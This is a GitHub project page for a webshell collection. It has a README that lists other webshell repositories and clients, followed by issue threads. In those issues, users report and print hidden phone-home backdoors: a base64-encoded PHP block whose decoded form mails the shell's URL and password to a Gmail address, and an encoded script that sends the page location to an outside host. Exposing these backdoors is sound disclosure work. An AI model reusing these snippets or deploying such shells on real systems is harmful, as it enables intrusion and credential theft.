Webshell - This is a webshell open source project


webshell | English






注意:所有shell 本人不保证是否有后门,但是自己上传的绝不会故意加后门


如发现存在后门代码,请issues 。



  1. webshell-venom
  2. 免杀webshell无限生成工具


Author : yzddmr6



other webshell project (update 2021-04-03)

  1. xl7dev/WebShell
  2. JohnTroony/php-webshells
  3. BlackArch/webshells
  4. LandGrey/webshell-detect-bypass
  5. JoyChou93/webshell
  6. bartblaze/PHP-backdoors
  7. WangYihang/Webshell-Sniper
  8. threedr3am/JSP-Webshells
  9. DeEpinGh0st/PHP-bypass-collection
  10. lcatro/PHP-WebShell-Bypass-WAF
  11. ysrc/webshell-sample
  12. tanjiti/webshellSample
  13. webshellpub/awsome-webshell
  14. tdifg/WebShell
  15. malwares/WebShell
  16. lhlsec/webshell
  17. oneoneplus/webshell
  18. vnhacker1337/Webshell
  19. backlion/webshell
  20. twepl/wso wso for php8


  1. 中国菜刀
  2. Cknife
  3. Altman
  4. xise
  5. Weevely
  6. quasibot
  7. Webshell-Sniper
  8. 蚁剑 antSword
  9. 冰蝎 Behinder
  10. webacoo
  11. 哥斯拉 Godzilla
  12. PhpSploit
  13. 以上排名不分先后

Author :tennc


license : MIT

Download link

Check github releases. Latest:


Thank you to JetBrains for providing an OSS development license for their products

Stargazers over time

  • Hidden Backdoor

    Hidden Backdoor

    in Line 75 you can see this code $wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); when i decode it i see mail() function to send (path ,password ,visitor ip) to this email okyazu@gmail.com @mail("okyazu@gmail.com",$judul,$body,$auth_pass);

    opened by dev0root 12
  • /php/404.php.txt 存在后门

    /php/404.php.txt 存在后门



    $visitc = $_COOKIE["visits"];
    if ($visitc == "") {
      $visitc  = 0;
      $visitor = $_SERVER["REMOTE_ADDR"];
      $web     = $_SERVER["HTTP_HOST"];
      $inj     = $_SERVER["REQUEST_URI"];
      $target  = rawurldecode($web.$inj);
      $judul   = "WSO 2.6 http://$target by $visitor";
      $body    = "Bug: $target by $visitor - $auth_pass";
      **if (!empty($web)) { @mail("okyazu@gmail.com",$judul,$body,$auth_pass); }**
    else { $visitc++; }
    opened by burnegg 5
  • Have a hiden native backdoor log

    Have a hiden native backdoor log

    In the code <img src=\"http://emp3ror.com/images/emplogo1.gif\"> send the referer of path to emp3ror.com server. The administrator catch all referers into emp3ror.com server log. Dont be evil.

    Other backdoor: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>

    The render is: a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);

    This send the referer site to other persons.

    This shell is dirty.

    opened by yhojann-cl 2
  • webshell readme更新请求

    webshell readme更新请求


    我fork了你的webshell,但是我希望我的repo里面确定都是没有后门的shells。所以打算依次检查所有的文件。 我看到你的readme写到:“所有shell 本人不保证是否有后门,但是自己上传的绝不会故意加后门” 可否在你的readme中加上你自己确认没有病毒的shell的文件列表,这样我可以少检查很多shells :)

    opened by Izib 2
  • Add a security policy

    Add a security policy

    Hey there!

    I belong to an open source security research community, and a member (@rohit75033) has found an issue, but doesn’t know the best way to disclose it.

    If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

    Thank you for your consideration, and I look forward to hearing from you!

    (cc @huntr-helper)

    opened by benharvie 1
  • Reame: translate to english

    Reame: translate to english

    I used mainly Google translate, so I could have gotten some things wrong, please use this as a first stept to translate your Readme into english.

    you could leave the original as Readme_zn.md if you like

    opened by rubo77 1
  • PHP7: undefined functions set_magic_quotes_runtime() and ereg()

    PHP7: undefined functions set_magic_quotes_runtime() and ereg()

    If you try to run this file on a newer webserver:


    You get lots of php errors

    could you update the shell to php7 pls?

    opened by rubo77 1
  • Need mysql shell-client for JSP

    Need mysql shell-client for JSP

    Hi guys! First off, thanks for your page. I'm looking mysql shell-client for jsp. (I just want browse tables,columns) I've founded mysql client in one of your shell's but there i can do just simple sql commands, that doesn't enough for me. Any help?

    opened by shadowzoom 1
  • r57 shell contains phone home backdoors

    r57 shell contains phone home backdoors

    webshell/138shell/R/r57 Shell.php.txt



    opened by Varbaek 1
  • webshell/php/非常规的pHp一句话木马.php


    这个代码有问题呀,next 这个就会报错。Notice: Use of undefined constant next - assumed 'next' in asx73ert 这个不是assert 应该也会报错吧。function 'asx73ert' not found or invalid function name in 我的测试环境是PHP5.6.8

    opened by ning1022 1
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